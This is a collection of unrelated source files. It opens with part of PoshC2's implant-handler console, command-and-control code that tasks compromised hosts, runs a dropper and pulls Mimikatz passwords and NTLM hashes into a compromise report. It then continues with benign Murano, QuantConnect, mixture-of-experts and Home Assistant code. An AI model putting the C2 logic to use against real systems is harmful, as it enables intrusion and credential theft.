elif(Sleep.endswith('m')):
sleep_int = int(Sleep[:-1]) * 60
elif(Sleep.endswith('h')):
sleep_int = int(Sleep[:-1]) * 60 * 60
else:
print(Colours.RED)
print("Incorrect sleep format: %s" % Sleep)
print(Colours.END)
continue
nowMinus3Beacons = now - timedelta(seconds=(sleep_int * 3))
nowMinus10Beacons = now - timedelta(seconds=(sleep_int * 10))
sID = "[" + str(ID) + "]"
if not Label:
sLabel = ""
else:
sLabel = "[" + Label + "]"
if nowMinus10Beacons > LastSeenTime:
print(Colours.RED + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
elif nowMinus3Beacons > LastSeenTime:
print(Colours.YELLOW + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
else:
print(Colours.GREEN + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
else:
from datetime import datetime, timedelta
now = datetime.now()
print(Colours.RED + "No Implants as of: %s" % now.strftime("%d/%m/%Y %H:%M:%S"))
print(Colours.END + "")
if printhelp:
print(printhelp)
t = tabCompleter()
t.createListCompleter(PRECOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
history = get_history_dict()
if history:
for command in history:
try:
readline.add_history(command[1])
except Exception:
pass
command = input("Select ImplantID or ALL or Comma Separated List (Enter to refresh):: ")
print("")
if command:
try:
last = get_lastcommand()
if last:
if last != command:
new_commandhistory(command)
else:
new_commandhistory(command)
except Exception:
pass
command = command.strip()
if (command == "") or (command == "back") or (command == "clear"):
startup(user)
if command.startswith("output-to-html"):
generate_table("Tasks")
generate_table("C2Server")
generate_table("Creds")
generate_table("Implants")
graphviz()
time.sleep(1)
startup(user)
if command.startswith("show-urls") or command.startswith("list-urls"):
urls = get_c2urls()
urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n"
for i in urls:
urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7])
startup(user, urlformatted)
if command.startswith("add-autorun"):
if command == "add-autorun":
startup(user, "Please specify a module to autorun")
autorun = command.replace("add-autorun ", "")
autorun = autorun.replace("add-autorun", "")
add_autorun(autorun)
startup(user, "add-autorun: %s\r\n" % autorun)
if command.startswith("list-autorun"):
autoruns = get_autorun()
startup(user, autoruns)
if command.startswith("del-autorun"):
autorun = command.replace("del-autorun ", "")
del_autorun(autorun)
startup(user, "deleted autorun\r\n")
if command.startswith("nuke-autorun"):
del_autoruns()
startup(user, "nuked autoruns\r\n")
if (command == "automigrate-frompowershell") or (command == "am"):
startup(user, "automigrate not currently implemented for the Python version of PoshC2\r\n")
if command.startswith("show-serverinfo"):
i = get_c2server_all()
detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s\n" % (i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12], i[13], i[14], i[15], i[16], i[17], i[18], i[19], i[20], i[21], i[22], i[23], i[24])
startup(user, detailsformatted)
if command.startswith("turnoff-notifications"):
update_item("EnableNotifications", "C2Server", "No")
startup(user, "Turned off notifications on new implant")
if command.startswith("turnon-notifications"):
update_item("EnableNotifications", "C2Server", "Yes")
startup(user, "Turned on notifications on new implant")
if command.startswith("set-clockworksmsapikey"):
cmd = command.replace("set-clockworksmsapikey ", "")
cmd = cmd.replace("set-clockworksmsapikey", "")
update_item("MobileNumber", "C2Server", cmd)
startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd)
if command.startswith("set-clockworksmsnumber"):
cmd = command.replace("set-clockworksmsnumber ", "")
cmd = cmd.replace("set-clockworksmsnumber", "")
update_item("APIKEY", "C2Server", cmd)
startup(user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd)
if command.startswith("set-defaultbeacon"):
new_sleep = command.replace("set-defaultbeacon ", "")
new_sleep = new_sleep.replace("set-defaultbeacon", "")
if not validate_sleep_time(new_sleep):
print(Colours.RED)
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
startup(user)
else:
update_item("DefaultSleep", "C2Server", new_sleep)
startup(user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep)
if command.startswith("opsec"):
implants = get_implants_all()
comtasks = get_tasks()
hosts = ""
uploads = ""
urls = ""
users = ""
creds = ""
hashes = ""
for i in implants:
if i[3] not in hosts:
hosts += "%s \n" % i[3]
if i[9] not in urls:
urls += "%s \n" % i[9]
for t in comtasks:
hostname = get_implantdetails(t[1])
command = t[2].lower()
output = t[3].lower()
if hostname[2] not in users:
users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3])
if "invoke-mimikatz" in t[2] and "logonpasswords" in t[3]:
allcreds = process_mimikatz(t[3])
for cred in allcreds:
if cred is not None:
if cred[1]:
creds += cred[0] + " Password: " + cred[1] + "\n"
if cred[2]:
hashes += cred[0] + " : NTLM:" + cred[2] + "\n"
if "uploading file" in command:
uploadedfile = command
uploadedfile = uploadedfile.partition("uploading file: ")[2].strip()
filehash = uploadedfile.partition(" with md5sum:")[2].strip()
uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip()
uploadedfile = uploadedfile.strip('"')
uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile)
if "installing persistence" in output:
implant_details = get_implantdetails(t[2])
line = command.replace('\n', '')
line = line.replace('\r', '')
filenameuploaded = line.rstrip().split(":", 1)[1]
uploads += "%s %s \n" % (implant_details[3], filenameuploaded)
if "written scf file" in output:
implant_details = get_implantdetails(t[2])
uploads += "%s %s\n" % (implant_details[3], output[output.indexof(':'):])
startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes))
if command.startswith("listmodules"):
mods = ""
for modname in os.listdir("%s/Modules/" % POSHDIR):
mods += "%s\r\n" % modname
startup(user, mods)
if command.startswith("creds"):
startup(user, "creds module not implemented yet")
if (command == "pwnself") or (command == "p"):
subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
startup(user)
if (command == "tasks") or (command == "tasks "):
alltasks = ""
tasks = get_newtasks_all()
if tasks is None:
startup(user, "No tasks queued!\r\n")
else:
for task in tasks:
imname = get_implantdetails(task[1])
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11], imname[2]), task[2])
startup(user, "Queued tasks:\r\n\r\n%s" % alltasks)
if (command == "cleartasks") or (command == "cleartasks "):
drop_newtasks()
startup(user, "Empty tasks queue\r\n")
if command.startswith("quit"):
ri = input("Are you sure you want to quit? (Y/n) ")
if ri.lower() == "n":
startup(user)
if ri == "":
sys.exit(0)
if ri.lower() == "y":
sys.exit(0)
if command.startswith("createdaisypayload"):
createdaisypayload(user, startup)
if command.startswith("createproxypayload"):
createproxypayload(user, startup)
if command.startswith("createnewpayload"):
createnewpayload(user, startup)
if (command == "?") or (command == "help"):
startup(user, pre_help)
if (command == "history") or command == "history ":
startup(user, get_history())
if command.startswith("use "):
command = command.replace("use ", "")
params = re.compile("use ", re.IGNORECASE)
command = params.sub("", command)
commandloop(command, user)
except Exception as e:
if 'unable to open database file' in e:
startup(user)
else:
traceback.print_exc()
print("Error: %s" % e)
print("Currently no valid implants: sleeping for 10 seconds")
time.sleep(10)
startup(user)
def runcommand(command, randomuri):
if command:
try:
last = get_lastcommand()
if last:
if last != command:
new_commandhistory(command)
else:
new_commandhistory(command)
except Exception:
pass
implant_type = get_implanttype(randomuri)
if implant_type.startswith("Python"):
handle_py_command(command, user, randomuri, startup)
elif implant_type.startswith("C#"):
handle_sharp_command(command, user, randomuri, startup)
else:
handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload)
return
def commandloop(implant_id, user):
while(True):
try:
implant_id_orig = implant_id
t = tabCompleter()
t.createListCompleter(COMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
if ("-" in implant_id) or ("all" in implant_id) or ("," in implant_id):
print(Colours.GREEN)
command = input("%s> " % (implant_id))
else:
hostname = get_hostdetails(implant_id)
if hostname[15] == 'Python':
t.createListCompleter(UXCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
if hostname[15] == 'C#':
t.createListCompleter(SHARPCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
print(Colours.GREEN)
print("%s\\%s @ %s (PID:%s)" % (hostname[11], hostname[2], hostname[3], hostname[8]))
command = input("%s> " % (implant_id))
# if "all" run through all implants get_implants()
if implant_id == "all":
if command == "back":
startup(user)
implant_split = get_implants()
if implant_split:
for implant_id in implant_split:
runcommand(command, implant_id[1])
# if "seperated list" against single uri
elif "," in implant_id:
implant_split = implant_id.split(",")
for implant_id in implant_split:
implant_id = get_randomuri(implant_id)
runcommand(command, implant_id)
# if "range" against single uri
elif "-" in implant_id:
implant_split = implant_id.split("-")
for implant_id in range(int(implant_split[0]), int(implant_split[1]) + 1):
try:
implant_id = get_randomuri(implant_id)
runcommand(command, implant_id)
except Exception:
print("Unknown ImplantID")
# else run against single uri
else:
implant_id = get_randomuri(implant_id)
runcommand(command, implant_id)
# then run back around
commandloop(implant_id_orig, user) # is this required for a while loop? looks like it would lead to a stackoverflow anyway?
except Exception:
print(Colours.RED)
print("Error running against the selected implant ID, ensure you have typed the correct information")
print(Colours.END)
# traceback.print_exc()
# print ("Error: %s" % e)
time.sleep(1)
startup(user, user)
if __name__ == '__main__':
original_sigint = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, catch_exit)
parser = argparse.ArgumentParser(description='The command line for handling implants in PoshC2')
parser.add_argument('-u', '--user', help='the user for this session')
args = parser.parse_args()
user = args.user
if user is None:
user = input("Enter your username: ")
startup(user)
|
the-stack_106_14895
|
# Copyright (c) 2014 Mirantis, Inc.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import cgi
import os
import tempfile
import jsonschema
from oslo_config import cfg
from oslo_db import exception as db_exc
from webob import exc
import murano.api.v1
from murano.api.v1 import schemas
from murano.common import policy
from murano.common import wsgi
from murano.db.catalog import api as db_api
from murano.common.i18n import _, _LW
from murano.openstack.common import exception
from murano.openstack.common import log as logging
from murano.packages import exceptions as pkg_exc
from murano.packages import load_utils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
SUPPORTED_PARAMS = murano.api.v1.SUPPORTED_PARAMS
LIST_PARAMS = murano.api.v1.LIST_PARAMS
ORDER_VALUES = murano.api.v1.ORDER_VALUES
PKG_PARAMS_MAP = murano.api.v1.PKG_PARAMS_MAP
def _check_content_type(req, content_type):
try:
req.get_content_type((content_type,))
except exception.InvalidContentType:
msg = _("Content-Type must be '{0}'").format(content_type)
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _get_filters(query_params):
filters = {}
for param_pair in query_params:
k, v = param_pair
if k not in SUPPORTED_PARAMS:
LOG.warning(_LW("Search by parameter '{name}' "
"is not supported. Skipping it.").format(name=k))
continue
if k in LIST_PARAMS:
filters.setdefault(k, []).append(v)
else:
filters[k] = v
order_by = filters.get('order_by', [])
for i in order_by[:]:
if ORDER_VALUES and i not in ORDER_VALUES:
filters['order_by'].remove(i)
LOG.warning(_LW(
"Value of 'order_by' parameter is not valid. "
"Allowed values are: {0}. Skipping it.").format(
", ".join(ORDER_VALUES)))
return filters
def _validate_body(body):
"""Check multipart/form-data has two parts: text (which is json string and
should parsed into dictionary in serializer) and file, which stores as
cgi.FieldStorage instance. Also validate file size doesn't exceed
the limit: seek to the end of the file, get the position of EOF and
reset the file position to the beginning
"""
def check_file_size(f):
mb_limit = CONF.packages_opts.package_size_limit
pkg_size_limit = mb_limit * 1024 * 1024
f.seek(0, 2)
size = f.tell()
f.seek(0)
if size > pkg_size_limit:
raise exc.HTTPBadRequest(explanation=_(
'Uploading file is too large.'
' The limit is {0} Mb').format(mb_limit))
if len(body.keys()) > 2:
msg = _("'multipart/form-data' request body should contain "
"1 or 2 parts: json string and zip archive. Current body "
"consists of {0} part(s)").format(len(body.keys()))
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
file_obj = None
package_meta = None
for part in body.values():
if isinstance(part, cgi.FieldStorage):
file_obj = part
check_file_size(file_obj.file)
if isinstance(part, dict):
package_meta = part
if file_obj is None:
msg = _('There is no file package with application description')
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
return file_obj, package_meta
class Controller(object):
"""WSGI controller for application catalog resource in Murano v1 API."""
def update(self, req, body, package_id):
"""List of allowed changes:
{ "op": "add", "path": "/tags", "value": [ "foo", "bar" ] }
{ "op": "add", "path": "/categories", "value": [ "foo", "bar" ] }
{ "op": "remove", "path": "/tags" }
{ "op": "remove", "path": "/categories" }
{ "op": "replace", "path": "/tags", "value": ["foo", "bar"] }
{ "op": "replace", "path": "/is_public", "value": true }
{ "op": "replace", "path": "/description",
"value":"New description" }
{ "op": "replace", "path": "/name", "value": "New name" }
"""
policy.check("modify_package", req.context, {'package_id': package_id})
pkg_to_update = db_api.package_get(package_id, req.context)
if pkg_to_update.is_public:
policy.check("manage_public_package", req.context)
_check_content_type(req, 'application/murano-packages-json-patch')
if not isinstance(body, list):
msg = _('Request body must be a JSON array of operation objects.')
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
for change in body:
if 'is_public' in change['path']:
if change['value'] is True and not pkg_to_update.is_public:
policy.check('publicize_package', req.context)
break
package = db_api.package_update(package_id, body, req.context)
return package.to_dict()
def get(self, req, package_id):
policy.check("get_package", req.context, {'package_id': package_id})
package = db_api.package_get(package_id, req.context)
return package.to_dict()
def search(self, req):
def _validate_limit(value):
if value is None:
return
try:
value = int(value)
except ValueError:
msg = _("limit param must be an integer")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
if value <= 0:
msg = _("limit param must be positive")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
return value
policy.check("get_package", req.context)
filters = _get_filters(req.GET.items())
limit = _validate_limit(filters.get('limit'))
if limit is None:
limit = CONF.packages_opts.limit_param_default
limit = min(CONF.packages_opts.api_limit_max, limit)
result = {}
catalog = req.GET.pop('catalog', '').lower() == 'true'
packages = db_api.package_search(
filters, req.context, limit, catalog=catalog)
if len(packages) == limit:
result['next_marker'] = packages[-1].id
result['packages'] = [package.to_dict() for package in packages]
return result
def upload(self, req, body=None):
"""Upload new file archive for the new package
together with package metadata.
"""
policy.check("upload_package", req.context)
_check_content_type(req, 'multipart/form-data')
file_obj, package_meta = _validate_body(body)
if package_meta:
try:
jsonschema.validate(package_meta, schemas.PKG_UPLOAD_SCHEMA)
except jsonschema.ValidationError as e:
msg = _("Package schema is not valid: {0}").format(e)
LOG.exception(msg)
raise exc.HTTPBadRequest(explanation=msg)
else:
package_meta = {}
if package_meta.get('is_public'):
policy.check('publicize_package', req.context)
with tempfile.NamedTemporaryFile(delete=False) as tempf:
LOG.debug("Storing package archive in a temporary file")
content = file_obj.file.read()
if not content:
msg = _("Uploading file can't be empty")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
tempf.write(content)
package_meta['archive'] = content
try:
pkg_to_upload = load_utils.load_from_file(
tempf.name, target_dir=None, drop_dir=True)
except pkg_exc.PackageLoadError as e:
msg = _("Couldn't load package from file: {0}").format(e)
LOG.exception(msg)
raise exc.HTTPBadRequest(explanation=msg)
finally:
LOG.debug("Deleting package archive temporary file")
os.remove(tempf.name)
# extend dictionary for update db
for k, v in PKG_PARAMS_MAP.iteritems():
if hasattr(pkg_to_upload, k):
package_meta[v] = getattr(pkg_to_upload, k)
try:
package = db_api.package_upload(package_meta, req.context.tenant)
except db_exc.DBDuplicateEntry:
msg = _('Package with specified full name is already registered')
LOG.exception(msg)
raise exc.HTTPConflict(msg)
return package.to_dict()
def get_ui(self, req, package_id):
target = {'package_id': package_id}
policy.check("get_package", req.context, target)
package = db_api.package_get(package_id, req.context)
return package.ui_definition
def get_logo(self, req, package_id):
target = {'package_id': package_id}
policy.check("get_package", req.context, target)
package = db_api.package_get(package_id, req.context)
return package.logo
def get_supplier_logo(self, req, package_id):
package = db_api.package_get(package_id, req.context)
return package.supplier_logo
def download(self, req, package_id):
target = {'package_id': package_id}
policy.check("download_package", req.context, target)
package = db_api.package_get(package_id, req.context)
return package.archive
def delete(self, req, package_id):
target = {'package_id': package_id}
policy.check("delete_package", req.context, target)
package = db_api.package_get(package_id, req.context)
if package.is_public:
policy.check("manage_public_package", req.context, target)
db_api.package_delete(package_id, req.context)
def get_category(self, req, category_id):
policy.check("get_category", req.context)
category = db_api.category_get(category_id, packages=True)
return category.to_dict()
def show_categories(self, req):
policy.check("get_category", req.context)
categories = db_api.categories_list()
return {'categories': [category.name for category in categories]}
def list_categories(self, req):
policy.check("get_category", req.context)
categories = db_api.categories_list()
return {'categories': [category.to_dict() for category in categories]}
def add_category(self, req, body=None):
policy.check("add_category", req.context)
if not body.get('name'):
raise exc.HTTPBadRequest(
explanation='Please, specify a name of the category to create')
try:
category = db_api.category_add(body['name'])
except db_exc.DBDuplicateEntry:
msg = _('Category with specified name is already exist')
LOG.error(msg)
raise exc.HTTPConflict(explanation=msg)
return category.to_dict()
def delete_category(self, req, category_id):
target = {'category_id': category_id}
policy.check("delete_category", req.context, target)
category = db_api.category_get(category_id, packages=True)
if category.packages:
msg = _("It's impossible to delete categories assigned"
" to the package, uploaded to the catalog")
raise exc.HTTPForbidden(explanation=msg)
db_api.category_delete(category_id)
class PackageSerializer(wsgi.ResponseSerializer):
def serialize(self, action_result, accept, action):
if action == 'get_ui':
accept = 'text/plain'
elif action in ('download', 'get_logo', 'get_supplier_logo'):
accept = 'application/octet-stream'
return super(PackageSerializer, self).serialize(action_result,
accept,
action)
def create_resource():
serializer = PackageSerializer()
return wsgi.Resource(Controller(), serializer=serializer)
|
the-stack_106_14896
|
import sys
import unittest
from inspect import signature
# from trex_stl_lib.api import *
from wireless.trex_wireless_rpc_message import *
from wireless.trex_wireless_traffic_handler_rpc import *
from wireless.trex_wireless_traffic_handler import *
class TrafficHandlerCallTest(unittest.TestCase):
"""Tests methods for the TrafficHandlerCall subclasses.
These tests test the existence of the functions on the traffic_handler.
"""
def test_function_well_defined(self):
"""Test that all TrafficHandlerCalls defined in 'trex_wireless_traffic_handler_rpc' are well defined traffic_handler calls in 'trex_wireless_traffic_handler'."""
traffic_handlercalls_classes = TrafficHandlerCall.__subclasses__() # TrafficHandlerCall subclasses
traffic_handlercalls_names = [wc.NAME for wc in traffic_handlercalls_classes] # Names of the TrafficHandlerCall subclasses
methods_name_list = [func for func in dir(TrafficHandler) if callable(getattr(TrafficHandler, func))] # all method names of TrafficHandler
methods_list = [getattr(TrafficHandler, func) for func in methods_name_list] # all methods of TrafficHandler
remote_calls_list = [method for method in methods_list if hasattr(method, "remote_call") and method.remote_call] # all methods tagged as remote_call of TrafficHandler
remote_calls_names_list = [method.__name__ for method in remote_calls_list] # all method names tagged as remote_call of TrafficHandler
# check that all TrafficHandlerCalls are defined as a TrafficHandler method
for wc in traffic_handlercalls_names:
self.assertTrue(wc in remote_calls_names_list, "TrafficHandlerCall {} should be implemented as a remote call in TrafficHandler".format(wc))
# check that all remote calls in TrafficHandler are defined as a TrafficHandlerCall
for rc in remote_calls_names_list:
self.assertTrue(rc in traffic_handlercalls_names, "remote Call {} should be implemnented as a TrafficHandlerCall".format(rc))
# check that all TrafficHandlerCalls match in the number of arguments
for wc in traffic_handlercalls_classes:
init_sig_params = signature(wc.__init__).parameters
wc_num_args = len(init_sig_params)
method = getattr(TrafficHandler, wc.NAME)
wc_method_num_args = len(signature(method).parameters)
self.assertEqual(wc_num_args, wc_method_num_args, "TrafficHandlerCall and TrafficHandler method '{}''s signature do not match".format(wc.NAME))
|
the-stack_106_14897
|
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from AlgorithmImports import *
### <summary>
### Test algorithm using 'QCAlgorithm.AddUniverseSelection(IUniverseSelectionModel)'
### </summary>
class AddUniverseSelectionModelAlgorithm(QCAlgorithm):
def Initialize(self):
''' Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''
self.SetStartDate(2013,10,8) #Set Start Date
self.SetEndDate(2013,10,11) #Set End Date
self.SetCash(100000) #Set Strategy Cash
self.UniverseSettings.Resolution = Resolution.Daily
# set algorithm framework models
self.SetAlpha(ConstantAlphaModel(InsightType.Price, InsightDirection.Up, timedelta(minutes = 20), 0.025, None))
self.SetPortfolioConstruction(EqualWeightingPortfolioConstructionModel())
self.SetExecution(ImmediateExecutionModel())
self.SetUniverseSelection(ManualUniverseSelectionModel([ Symbol.Create("SPY", SecurityType.Equity, Market.USA) ]))
self.AddUniverseSelection(ManualUniverseSelectionModel([ Symbol.Create("AAPL", SecurityType.Equity, Market.USA) ]))
self.AddUniverseSelection(ManualUniverseSelectionModel(
Symbol.Create("SPY", SecurityType.Equity, Market.USA), # duplicate will be ignored
Symbol.Create("FB", SecurityType.Equity, Market.USA)))
def OnEndOfAlgorithm(self):
if self.UniverseManager.Count != 3:
raise ValueError("Unexpected universe count")
if self.UniverseManager.ActiveSecurities.Count != 3:
raise ValueError("Unexpected active securities")
|
the-stack_106_14899
|
r"""
Balanced gate with Switch Transformer's policy (Google, 2021)
"""
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from .naive_gate import NaiveGate
from .utils import limit_by_capacity
class SwitchGate(NaiveGate):
r"""
A switch gate implementation
"""
def __init__(self, d_model, num_expert, world_size, topk=1,
switch_eps=.1, capacity=(1.2, 2.4),gate_all_comm=True, inner_gpu_cnt=4,save=False,layer_idx=-1,loss_k=1):
assert topk == 1, 'topk should be 1 in switch'
super().__init__(d_model, num_expert, world_size, top_k=1)
self.switch_eps = switch_eps
self.capacity = capacity
# self.k = loss_k
self.k=0.2
print("loss k is:",self.k)
def forward(self, inp):
r"""
The switch firstly conduct softmax and then calculates the top-1
"""
score = self.gate(inp)
if self.training:
# random uniform number from [1-eps, 1+eps]
noise = torch.rand_like(score)
noise = noise * 2 * self.switch_eps + 1.0 - self.switch_eps
score += noise
# fp32 softmax for numerical stability
score = F.softmax(score.float(), dim=-1)
top1_score, top1_idx = torch.topk(
score, k=1, dim=-1, largest=True
) # [.. x top_k]
top1_score = top1_score.to(dtype=inp.dtype)
# cap_rate = self.capacity[0 if self.training else 1]
# capacity = math.ceil(cap_rate * inp.shape[0])
# _new_lec, _new_gec, top1_idx = limit_by_capacity(
# top1_idx, self.num_expert, self.world_size, capacity)
# valid_idx = top1_idx[top1_idx > -1]
valid_idx = top1_idx[top1_idx > -1] # fix bug
fraction_expert = torch.scatter_add(
torch.zeros(self.tot_expert, device=valid_idx.device),
0,
valid_idx,
torch.ones_like(valid_idx, dtype=torch.float),
) / valid_idx.numel()
prob_expert = score.sum(dim=0) / valid_idx.numel()
loss = (fraction_expert * prob_expert).sum() * self.tot_expert
cap_rate = self.capacity[0 if self.training else 1]
capacity = math.ceil(cap_rate * inp.shape[0])
_new_lec, _new_gec, top1_idx = limit_by_capacity(
top1_idx, self.num_expert, self.world_size, capacity)
# if torch.distributed.get_rank()==0:
# print(loss,valid_idx.numel())
# quit()
# print(loss,valid_idx.numel())
self.set_loss(loss*self.k)
return top1_idx, top1_score
|
the-stack_106_14901
|
"""An abstract class for entities."""
from abc import ABC
import asyncio
from datetime import datetime, timedelta
import functools as ft
import logging
from timeit import default_timer as timer
from typing import Any, Awaitable, Dict, Iterable, List, Optional
from homeassistant.config import DATA_CUSTOMIZE
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_DEVICE_CLASS,
ATTR_ENTITY_PICTURE,
ATTR_FRIENDLY_NAME,
ATTR_ICON,
ATTR_SUPPORTED_FEATURES,
ATTR_UNIT_OF_MEASUREMENT,
DEVICE_DEFAULT_NAME,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import CALLBACK_TYPE, Context, HomeAssistant, callback
from homeassistant.exceptions import HomeAssistantError, NoEntitySpecifiedError
from homeassistant.helpers.entity_platform import EntityPlatform
from homeassistant.helpers.entity_registry import RegistryEntry
from homeassistant.helpers.event import Event, async_track_entity_registry_updated_event
from homeassistant.helpers.typing import StateType
from homeassistant.loader import bind_hass
from homeassistant.util import dt as dt_util, ensure_unique_string, slugify
_LOGGER = logging.getLogger(__name__)
SLOW_UPDATE_WARNING = 10
DATA_ENTITY_SOURCE = "entity_info"
SOURCE_CONFIG_ENTRY = "config_entry"
SOURCE_PLATFORM_CONFIG = "platform_config"
@callback
@bind_hass
def entity_sources(hass: HomeAssistant) -> Dict[str, Dict[str, str]]:
"""Get the entity sources."""
return hass.data.get(DATA_ENTITY_SOURCE, {})
def generate_entity_id(
entity_id_format: str,
name: Optional[str],
current_ids: Optional[List[str]] = None,
hass: Optional[HomeAssistant] = None,
) -> str:
"""Generate a unique entity ID based on given entity IDs or used IDs."""
return async_generate_entity_id(entity_id_format, name, current_ids, hass)
@callback
def async_generate_entity_id(
entity_id_format: str,
name: Optional[str],
current_ids: Optional[Iterable[str]] = None,
hass: Optional[HomeAssistant] = None,
) -> str:
"""Generate a unique entity ID based on given entity IDs or used IDs."""
name = (name or DEVICE_DEFAULT_NAME).lower()
preferred_string = entity_id_format.format(slugify(name))
if current_ids is not None:
return ensure_unique_string(preferred_string, current_ids)
if hass is None:
raise ValueError("Missing required parameter current_ids or hass")
test_string = preferred_string
tries = 1
while not hass.states.async_available(test_string):
tries += 1
test_string = f"{preferred_string}_{tries}"
return test_string
class Entity(ABC):
"""An abstract class for Home Assistant entities."""
# SAFE TO OVERWRITE
# The properties and methods here are safe to overwrite when inheriting
# this class. These may be used to customize the behavior of the entity.
entity_id = None # type: str
# Owning hass instance. Will be set by EntityPlatform
hass: Optional[HomeAssistant] = None
# Owning platform instance. Will be set by EntityPlatform
platform: Optional[EntityPlatform] = None
# If we reported if this entity was slow
_slow_reported = False
# If we reported this entity is updated while disabled
_disabled_reported = False
# Protect for multiple updates
_update_staged = False
# Process updates in parallel
parallel_updates: Optional[asyncio.Semaphore] = None
# Entry in the entity registry
registry_entry: Optional[RegistryEntry] = None
# Hold list for functions to call on remove.
_on_remove: Optional[List[CALLBACK_TYPE]] = None
# Context
_context: Optional[Context] = None
_context_set: Optional[datetime] = None
# If entity is added to an entity platform
_added = False
@property
def should_poll(self) -> bool:
"""Return True if entity has to be polled for state.
False if entity pushes its state to HA.
"""
return True
@property
def unique_id(self) -> Optional[str]:
"""Return a unique ID."""
return None
@property
def name(self) -> Optional[str]:
"""Return the name of the entity."""
return None
@property
def state(self) -> StateType:
"""Return the state of the entity."""
return STATE_UNKNOWN
@property
def capability_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the capability attributes.
Attributes that explain the capabilities of an entity.
Implemented by component base class. Convention for attribute names
is lowercase snake_case.
"""
return None
@property
def state_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the state attributes.
Implemented by component base class. Convention for attribute names
is lowercase snake_case.
"""
return None
@property
def device_state_attributes(self) -> Optional[Dict[str, Any]]:
"""Return device specific state attributes.
Implemented by platform classes. Convention for attribute names
is lowercase snake_case.
"""
return None
@property
def device_info(self) -> Optional[Dict[str, Any]]:
"""Return device specific attributes.
Implemented by platform classes.
"""
return None
@property
def device_class(self) -> Optional[str]:
"""Return the class of this device, from component DEVICE_CLASSES."""
return None
@property
def unit_of_measurement(self) -> Optional[str]:
"""Return the unit of measurement of this entity, if any."""
return None
@property
def icon(self) -> Optional[str]:
"""Return the icon to use in the frontend, if any."""
return None
@property
def entity_picture(self) -> Optional[str]:
"""Return the entity picture to use in the frontend, if any."""
return None
@property
def available(self) -> bool:
"""Return True if entity is available."""
return True
@property
def assumed_state(self) -> bool:
"""Return True if unable to access real state of the entity."""
return False
@property
def force_update(self) -> bool:
